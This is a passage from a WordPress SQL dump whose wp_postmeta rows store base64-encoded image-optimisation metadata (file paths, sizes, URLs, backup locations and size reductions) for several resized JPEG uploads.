bFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTc2OHg1MTQuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTc2OHg1MTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvREVOVEFMLTc2OHg1MTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMzQ0LCJpZCI6MTI5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9ERU5UQUwtMTYwMHgxMDcxLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNzEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTE2MDB4MTA3MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9ERU5UQUwtMTYwMHgxMDcxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzM0OCwiaWQiOjEyOTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvREVOVEFMLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMzUxLCJpZCI6MTI5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9ERU5UQUwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9ERU5UQUwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9ERU5UQUwtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMzNTMsImlkIjoxMjkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RFTlRBTC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RFTlRBTC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0RFTlRBTC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzM1NSwiaWQiOjEyOTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvREVOVEFMLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMzU4LCJpZCI6MTI5MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RFTlRBTC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RFTlRBTC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0RFTlRBTC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzM2MCwiaWQiOjEyOTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9ERU5UQUwtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9ERU5UQUwtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9ERU5UQUwtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMzNjMsImlkIjoxMjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvREVOVEFMLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMzY1LCJpZCI6MTI5MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RFTlRBTC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RFTlRBTC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0RFTlRBTC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzM2NywiaWQiOjEyOTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9ERU5UQUwtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9ERU5UQUwtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9ERU5UQUwtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMzNzAsImlkIjoxMjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvREVOVEFMLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMzcyLCJpZCI6MTI5MX1d'); 
INSERT INTO `wp_postmeta` VALUES (29617, 1290, 'wpfc_optimisation_reduction', '17590'); 
INSERT INTO `wp_postmeta` VALUES (29618, 1290, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLmpwZyIsIndpZHRoIjo1NDcyLCJoZWlnaHQiOjM2NDgsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzMzNzcsImlkIjoiMTI5MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2NDMsInRpbWUiOjE0ODM1NzMzODAsImlkIjoxMjkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTYyMiwidGltZSI6MTQ4MzU3MzM4NCwiaWQiOjEyOTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxNDkwLCJ0aW1lIjoxNDgzNTczMzg4LCJpZCI6MTI5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6ODE3MiwidGltZSI6MTQ4MzU3MzM5MiwiaWQiOjEyOTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0ODUsInRpbWUiOjE0ODM1NzMzOTUsImlkIjoxMjkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDE2LCJ0aW1lIjoxNDgzNTczMzk5LCJpZCI6MTI5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ1NSwidGltZSI6MTQ4MzU3MzQwMiwiaWQiOjEyOTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMzYxLCJ0aW1lIjoxNDgzNTczNDA2LCJpZCI6MTI5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDMyLCJ0aW1lIjoxNDgzNTczNDA5LCJpZCI6MTI5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDEyLCJ0aW1lIjoxNDgzNTczNDEyLCJpZCI6MTI5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDQ2LCJ0aW1lIjoxNDgzNTczNDE2LCJpZCI6MTI5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTA2LCJ0aW1lIjoxNDgzNTczNDE5LCJpZCI6MTI5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTI1LCJ0aW1lIjoxNDgzNTczNDIyLCJpZCI6MTI5MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NjI1LCJ0aW1lIjoxNDgzNTczNDI2LCJpZCI6MTI5MH1d'); 
INSERT INTO `wp_postmeta` VALUES (29619, 1289, 'wpfc_optimisation_reduction', '24671'); 
INSERT INTO `wp_postmeta` VALUES (29620, 1289, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24uanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi5qcGciLCJ3aWR0aCI6NDI1NiwiaGVpZ2h0IjoyODMyLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTczNDMxLCJpZCI6IjEyODkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODI4LCJ0aW1lIjoxNDgzNTczNDM0LCJpZCI6MTI4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi04MDB4NTMyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29